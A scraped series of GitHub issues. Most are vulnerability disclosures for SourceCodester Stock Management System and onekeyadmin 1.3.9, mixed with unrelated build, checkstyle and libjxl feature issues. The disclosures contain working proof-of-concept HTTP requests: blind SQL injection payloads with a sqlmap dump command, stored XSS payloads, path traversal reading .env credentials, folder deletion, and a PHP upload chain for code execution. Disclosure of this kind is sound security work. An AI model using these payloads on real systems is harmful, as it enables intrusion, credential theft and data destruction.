- file:/home/nair/.m2/repository/org/opensearch/gradle/build-tools/1.0.0-alpha2/build-tools-1.0.0-alpha2.pom
Required by:
project :data-prepper-plugins:opensearch
**To Reproduce**
Steps to reproduce the behavior:
1. Clone the data-prepper repository from github
2. run - ./gradlew build
3. Error message:
4.
Starting a Gradle Daemon, 1 incompatible and 1 stopped Daemons could not be reused, use --status for details
FAILURE: Build failed with an exception.
* What went wrong:
A problem occurred configuring project ':data-prepper-plugins:opensearch'.
> Could not resolve all artifacts for configuration ':data-prepper-plugins:opensearch:classpath'.
> Could not find org.opensearch.gradle:build-tools:1.0.0-alpha2.
Searched in the following locations:
- https://plugins.gradle.org/m2/org/opensearch/gradle/build-tools/1.0.0-alpha2/build-tools-1.0.0-alpha2.pom
- file:/home/nair/.m2/repository/org/opensearch/gradle/build-tools/1.0.0-alpha2/build-tools-1.0.0-alpha2.pom
Required by:
project :data-prepper-plugins:opensearch
**Expected behavior**
Jar file is build for the data-prepper-plugins project.
**Screenshots**
Error messages attached above
**Environment (please complete the following information):**
- OS: Ubuntu 20.04 LTS
- Version v1.0.0
**Additional context**
Following comment is included in the build.gradle file.
// TODO: replace local built OpenSearch artifact with the public artifact
| Cannot build the project/jar - Data-prepper-plugins | https://api.github.com/repos/opensearch-project/data-prepper/issues/97/comments | 4 | 2021-05-21T18:44:38Z | 2021-10-12T14:37:57Z | https://github.com/opensearch-project/data-prepper/issues/97 | 898,321,716 | 97 |
[
"opensearch-project",
"data-prepper"
] | **Describe the bug**
Noticed checkstyle errors ignored in https://github.com/opensearch-project/data-prepper/runs/2442523964#step:7:422, not sure it's on purpose.
```
Error: eckstyle] [ERROR] /home/runner/work/data-prepper/data-prepper/data-prepper-plugins/opensearch/src/main/java/com/amazon/dataprepper/plugins/sink/opensearch/IndexStateManagement.java:90: Line is longer than 140 characters (found 143). [LineLength]
```
| Checkstyle errors seem to be ignored | https://api.github.com/repos/opensearch-project/data-prepper/issues/55/comments | 3 | 2021-04-27T15:10:19Z | 2022-06-27T18:50:39Z | https://github.com/opensearch-project/data-prepper/issues/55 | 868,949,762 | 55 |
[
"opensearch-project",
"data-prepper"
] | We will no longer support ODFE < 1.13.0 in OpenSearchSink. This is expected to happen after release 1.0.0.0-beta1. | Remove support for ODFE < 1.13.0 | https://api.github.com/repos/opensearch-project/data-prepper/issues/53/comments | 2 | 2021-04-26T21:41:53Z | 2022-02-21T20:08:03Z | https://github.com/opensearch-project/data-prepper/issues/53 | 868,225,393 | 53 |
[
"HaojianWang",
"cve"
] | # SourceCodester Stock Management System in PHP 1.0 createBrand.php SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Stock Management System in PHP
## Vendor Homepage
+ https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Wang Haojian
## Vulnerable File
+ createBrand.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the "createBrand. php" file of the "Inventory Management System" project. The reason for this issue is that the user inputs the 'brandName' from the '$brandName=$$POST ['brandName'] 'and uses it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Vulnerability code snippets
```php
<?php
require_once 'core.php';
$valid['success'] = array('success' => false, 'messages' => array());
if($_POST) {
$brandName = $_POST['brandName'];
$brandStatus = $_POST['brandStatus'];
$sql = "INSERT INTO brands (brand_name, brand_active, brand_status) VALUES ('$brandName', '$brandStatus', 1)";
if($connect->query($sql) === TRUE) {
$valid['success'] = true;
$valid['messages'] = "Successfully Added";
} else {
$valid['success'] = false;
$valid['messages'] = "Error while adding the members";
}
$connect->close();
echo json_encode($valid);
} // /if $_POST
```
+ In the above code, the username and password are directly embedded in the SQL query, making them vulnerable to SQL injection attacks
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the "Stock Management System," Wang Haojian discovered a critical SQL injection vulnerability in the `createBrand.php` file. This vulnerability stems from inadequate validation of user inputs for the username and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ MySQL >= 5.0.12 AND time-based blind (query SLEEP)
## Vulnerability location:
+ 'brandName' parameter
## Payload:
```sql
brandName=11' RLIKE (SELECT (CASE WHEN (7581=7581) THEN 11 ELSE 0x28 END)) AND 'kYxl'='kYxl&brandStatus=1
brandName=11' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))kiXH) AND 'VTnH'='VTnH&brandStatus=1
```
```makefile
Parameter: brandName (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: brandName=11' RLIKE (SELECT (CASE WHEN (7581=7581) THEN 11 ELSE 0x28 END)) AND 'kYxl'='kYxl&brandStatus=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: brandName=11' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))kiXH) AND 'VTnH'='VTnH&brandStatus=1
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://localhost/stock/php_action/createBrand.php" --data="brandName=11&brandStatus=1" --method=POST --dbms=mysql --level=5 --risk=3 --batch --dbs --dump
```
+ 
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
| SourceCodester Stock Management System in PHP 1.0 createBrand.php SQL injection vulnerability | https://api.github.com/repos/HaojianWang/cve/issues/1/comments | 0 | 2024-05-28T04:56:11Z | 2024-05-28T04:56:11Z | https://github.com/HaojianWang/cve/issues/1 | 2,320,120,757 | 1 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#userGroup/index
<img width="1004" alt="image" src="https://user-images.githubusercontent.com/122217858/211449430-48880bb8-a73f-4ff0-b1e7-f3fef5c5876e.png">
poc
POST /admin1/userGroup/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/userGroup/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"id":"","title":"test<img src=1 onerror=alert(\"xss\");>","integral":0,"default":0,"status":1,"theme":"template"}
<img width="986" alt="image" src="https://user-images.githubusercontent.com/122217858/211449463-e02099cc-63c1-41c5-af52-ff6d9a29d891.png">
then you can view xss in url
http://192.168.3.129:8091/admin1#userGroup/index
<img width="1010" alt="image" src="https://user-images.githubusercontent.com/122217858/211449494-db258986-7f18-4e94-a537-1687f0680191.png">
| Backstage member grouping - add storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/11/comments | 1 | 2023-01-10T02:40:17Z | 2023-03-20T02:14:48Z | https://github.com/keheying/onekeyadmin/issues/11 | 1,526,667,366 | 11 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#user/index
<img width="1003" alt="image" src="https://user-images.githubusercontent.com/122217858/211449289-c7c83177-343e-4d96-a7dc-bbeb51a09fa1.png">
POST /admin1/user/update HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 532
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/user/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"id":1,"group_id":73,"nickname":"test<img src=1 onerror=alert(\"xss\");>","sex":0,"email":"cc@cc.com","mobile":"","password":"","cover":"","describe":"","birthday":"2023-01-09","now_integral":0,"history_integral":0,"balance":"0.00","pay_paasword":"","login_ip":"","login_count":0,"login_time":"2023-01-09 22:09:57","update_time":"2023-01-09 22:09:57","create_time":"2023-01-09 22:09:57","status":1,"reason":null,"hide":1,"group_title":"11112","url":"http://192.168.3.129:8091/user/info.html?id=1&theme=template","theme":"template"}
then you can view xss in url
http://192.168.3.129:8091/admin1#user/index
<img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211449350-4ac0a7af-15ef-443e-b690-818412f48394.png">
| Backstage member list - add storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/10/comments | 1 | 2023-01-10T02:38:50Z | 2023-03-20T02:14:11Z | https://github.com/keheying/onekeyadmin/issues/10 | 1,526,666,374 | 10 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#catalog/index
<img width="1007" alt="image" src="https://user-images.githubusercontent.com/122217858/211449085-6515597a-4ad8-4236-8856-0ece625e9aab.png">
poc
POST /admin1/catalog/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 334
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/catalog/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"cover":"","title":"test<img src=1 onerror=alert(\"xss\");>","pid":0,"show":1,"type":"page","seo_url":"test","bind_html":"","group_id":[],"links_type":0,"links_value":{},"sort":0,"id":"","status":1,"mobile":1,"blank":0,"description":"","content":"","seo_title":"","seo_keywords":"","seo_description":"","field":[],"theme":"template"}
<img width="1017" alt="image" src="https://user-images.githubusercontent.com/122217858/211449133-1af69f4d-dde3-4883-a69e-02bbcf32a07f.png">
then you can view xss in url
http://192.168.3.129:8091/admin1#catalog/index
<img width="986" alt="image" src="https://user-images.githubusercontent.com/122217858/211449169-cee33dc6-bca9-41ee-b291-255532ff2269.png">
| Background category management - adding categories has a storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/9/comments | 1 | 2023-01-10T02:37:38Z | 2023-03-20T02:13:12Z | https://github.com/keheying/onekeyadmin/issues/9 | 1,526,665,614 | 9 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
url
http://192.168.3.129:8091/admin1#admin/index
<img width="990" alt="image" src="https://user-images.githubusercontent.com/122217858/211448923-cc5a1f39-eacc-4087-b7e2-fce1c31c5589.png">
poc
POST /admin1/admin/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 224
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/admin/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"id":"","cover":"","account":"test<img src=1 onerror=alert(\"xss\");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login_count":"","group_id":1,"password":"aa@xxxqq.com","status":1,"create_time":"","theme":"template"}
<img width="1030" alt="image" src="https://user-images.githubusercontent.com/122217858/211448968-fecf17b0-a8de-486d-a996-8460d5c5a55e.png">
then you can view xss in url
http://192.168.3.129:8091/admin1#admin/index
<img width="993" alt="image" src="https://user-images.githubusercontent.com/122217858/211448987-a4e80247-9438-4702-a6d6-dc1659046993.png">
| Background administrator management - Adding an administrator has a storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/8/comments | 1 | 2023-01-10T02:36:01Z | 2023-03-20T02:14:35Z | https://github.com/keheying/onekeyadmin/issues/8 | 1,526,664,640 | 8 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
url
http://192.168.3.129:8091/admin1#adminMenu/index
<img width="923" alt="image" src="https://user-images.githubusercontent.com/122217858/211448785-520621b1-13e7-47ba-8877-dea426ccd218.png">
poc
POST /admin1/adminMenu/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 145
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/adminMenu/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"id":"","icon":"","title":"test<img src=1 onerror=alert(\"xss\");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"}
<img width="1006" alt="image" src="https://user-images.githubusercontent.com/122217858/211448829-ae68d2ab-47ad-428b-9194-e79dbeae38ca.png">
then you can view xss in url
http://192.168.3.129:8091/admin1#adminMenu/index
<img width="1008" alt="image" src="https://user-images.githubusercontent.com/122217858/211448853-c849d705-1eb2-44a4-895a-7bffe3bfaad4.png">
| Background menu rules - add menu has storage xss vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/7/comments | 1 | 2023-01-10T02:34:44Z | 2023-03-20T02:14:24Z | https://github.com/keheying/onekeyadmin/issues/7 | 1,526,663,841 | 7 |
[
"keheying",
"onekeyadmin"
] | 1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
4. Vulnerability Details:
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#adminGroup/index
<img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211448666-b9ab1842-811e-439e-9772-736ebd705ae9.png">
`POST /admin1/adminGroup/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 95
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/adminGroup/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"id":"","title":"<img src=1 onerror=alert(\"xss\");>","status":1,"role":[],"theme":"template"}`
<img width="959" alt="image" src="https://user-images.githubusercontent.com/122217858/211448696-b9b28efb-0a93-44ae-a955-0a3673c32147.png">
then you can view xss in
url:
http://192.168.3.129:8091/admin1#adminGroup/index
<img width="964" alt="image" src="https://user-images.githubusercontent.com/122217858/211448720-02254b32-8282-4289-9cbb-589d47387ff3.png">
| Background role management - there is a storage xss vulnerability in adding roles | https://api.github.com/repos/keheying/onekeyadmin/issues/6/comments | 1 | 2023-01-10T02:33:30Z | 2023-03-20T02:15:00Z | https://github.com/keheying/onekeyadmin/issues/6 | 1,526,663,021 | 6 |
[
"keheying",
"onekeyadmin"
] |
1. Vulnerability affects product:onekeyadmin
2. Vulnerability affects version 1.3.9
3. Vulnerability type:file reading
4. Vulnerability Details:
Vulnerability location
Vulnerability occurs in
The app\admin\controller\File#download method directly does not filter the incoming url, causing arbitrary file reading
<img width="982" alt="image" src="https://user-images.githubusercontent.com/122217858/211448532-536eda57-ef0d-4d39-addb-5b7f526760d2.png">
Vulnerability reproduction Read the database configuration file.env
`GET /admin1/file/download?url=../.env&title=英文.png HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1/file/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close`
<img width="935" alt="image" src="https://user-images.githubusercontent.com/122217858/211448592-f132bba5-1548-438e-bb5c-d65b5fc492c1.png">
| Background arbitrary file reading vulnerability 2 | https://api.github.com/repos/keheying/onekeyadmin/issues/5/comments | 1 | 2023-01-10T02:32:14Z | 2023-03-20T02:12:46Z | https://github.com/keheying/onekeyadmin/issues/5 | 1,526,662,071 | 5 |
[
"keheying",
"onekeyadmin"
] | Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file reading
Vulnerability Details:
Vulnerability location
app\admin\controller\Curd#code Here the file_get_contents function is called without any filtering
<img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211448366-0a317737-9491-4cd6-af6b-9698c4f96784.png">
So we can write the file we want to read into menu.png to cause any file to be read
Vulnerability recurrence
Here we read the database configuration file .env in the root directory
poc
`POST /admin1/curd/code HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 59
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/curd/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"name":"test","title":"test","cover":"../.env","table":[]}`
<img width="955" alt="image" src="https://user-images.githubusercontent.com/122217858/211448409-1051109b-f270-4e5b-bdf3-3ef1f4a1554f.png">
You can see that the file was successfully written to our menu.png, causing any file to be read
http://192.168.3.129:8091/plugins/test/menu.png
<img width="882" alt="image" src="https://user-images.githubusercontent.com/122217858/211448439-551b5980-936d-462d-8c14-8728e7032a47.png">
| Background development assistant arbitrary file reading vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/4/comments | 1 | 2023-01-10T02:31:12Z | 2023-03-20T02:15:15Z | https://github.com/keheying/onekeyadmin/issues/4 | 1,526,661,312 | 4 |
[
"keheying",
"onekeyadmin"
] | Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file delete
Vulnerability Details:
Vulnerability location
Vulnerability occurs in
app\admin\controller\plugins#delete method
<img width="976" alt="image" src="https://user-images.githubusercontent.com/122217858/211448184-cbc2f44f-3294-4e15-ac66-8eb9a975ee2d.png">
Here the delDirAndFile method of use onekey\File# is called
<img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211448228-b237bd17-cb4a-4e48-aec5-e4979aaaf313.png">
Vulnerability recurrence
Conditions: background administrator rights
Next I will delete the E:\onekeyadmin-main\public\111\ directory
`POST /admin1/plugins/delete HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0f1ac62d78a3647890cbd8acd3d458b7
Connection: close
Content-Length: 17
Content-Type: application/json
{"name":"../111"}`
<img width="992" alt="image" src="https://user-images.githubusercontent.com/122217858/211448297-9356a5d9-069c-4417-a777-828415fb1473.png">
| Background arbitrary folder deletion vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/3/comments | 1 | 2023-01-10T02:29:40Z | 2023-03-20T02:15:29Z | https://github.com/keheying/onekeyadmin/issues/3 | 1,526,660,136 | 3 |
[
"keheying",
"onekeyadmin"
] | Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file delete
Vulnerability Details:
Background arbitrary folder deletion 1 vulnerability
Vulnerability location
Vulnerability occurs in
app\admin\controller\Themes#delete method
<img width="973" alt="image" src="https://user-images.githubusercontent.com/122217858/211447839-520b03ef-527a-4f2a-8a25-fbd267a5e901.png">
Here the delDirAndFile method of use onekey\File# is called
<img width="976" alt="image" src="https://user-images.githubusercontent.com/122217858/211447867-069f38f3-b768-419f-acd4-a0f343cb6f7e.png">
You can see that if the input is a directory, first traverse and delete the files in the directory and then delete the directory
Vulnerability recurrence
Next I will delete the E:\onekeyadmin-main\public\111\ directory
`POST /admin1/themes/delete HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0f1ac62d78a3647890cbd8acd3d458b7
Connection: close
Content-Length: 17
Content-Type: application/json
{"name":"../111"}`
<img width="982" alt="image" src="https://user-images.githubusercontent.com/122217858/211447932-e36855fd-9b1c-4ce6-9cbd-8febe9c0eed8.png">
| Background arbitrary folder deletion 1 vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/2/comments | 0 | 2023-01-10T02:26:58Z | 2023-02-15T05:49:55Z | https://github.com/keheying/onekeyadmin/issues/2 | 1,526,658,134 | 2 |
[
"keheying",
"onekeyadmin"
] | Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:Remote code execution
Vulnerability Details:
Remote code execution caused by uploading arbitrary files in the background
Vulnerability location
Vulnerability occurs in
app\admin\controller\File#upload Although there are restrictions on ext
<img width="976" alt="image" src="https://user-images.githubusercontent.com/122217858/211447414-69a5d85f-5041-4cf2-8313-704b2167ca3f.png">
but we found
The app\admin\controller\Config#update method can update the limit
<img width="974" alt="image" src="https://user-images.githubusercontent.com/122217858/211447538-8355f2c7-0c7c-47ba-aaf8-495e15e4e545.png">
<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447550-6c26d381-7e9a-4b4a-9ada-9d217533f409.png">
Vulnerability recurrence
Conditions Admin
poc
The first step is to update the configuration to allow uploading php files
`POST /admin1/config/update HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 398
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/config/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close
{"title":"涓婁紶闄愬埗","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}`
<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png">
The second step is to upload malicious files
`POST /admin1/file/upload HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 280
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP
Accept: */*
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/file/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="name"
templatex
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: text/php
<?php phpinfo();?>
------WebKitFormBoundaryARP8fRC2kb4GP3oP--
`
<img width="961" alt="image" src="https://user-images.githubusercontent.com/122217858/211447704-42a1446e-adf1-4332-8359-248bbc28d2ae.png">
<img width="984" alt="image" src="https://user-images.githubusercontent.com/122217858/211447729-9965e8e7-fe26-4612-96f9-d222eead2a79.png">
| Remote code execution caused by uploading arbitrary files in the background | https://api.github.com/repos/keheying/onekeyadmin/issues/1/comments | 1 | 2023-01-10T02:25:19Z | 2023-03-20T02:13:00Z | https://github.com/keheying/onekeyadmin/issues/1 | 1,526,656,884 | 1 |
[
"libjxl",
"libjxl"
] | `libjpeg` and also `libwebp` support a so-called shrink factor. This is especially useful when creating thumbnails of images as it can speed things up quite significantly. From the `libjpeg` documentation:
```
unsigned int scale_num, scale_denom
Scale the image by the fraction scale_num/scale_denom. Default is
1/1, or no scaling. Currently, the only supported scaling ratios
are M/8 with all M from 1 to 16, or any reduced fraction thereof (such
as 1/2, 3/4, etc.)
```
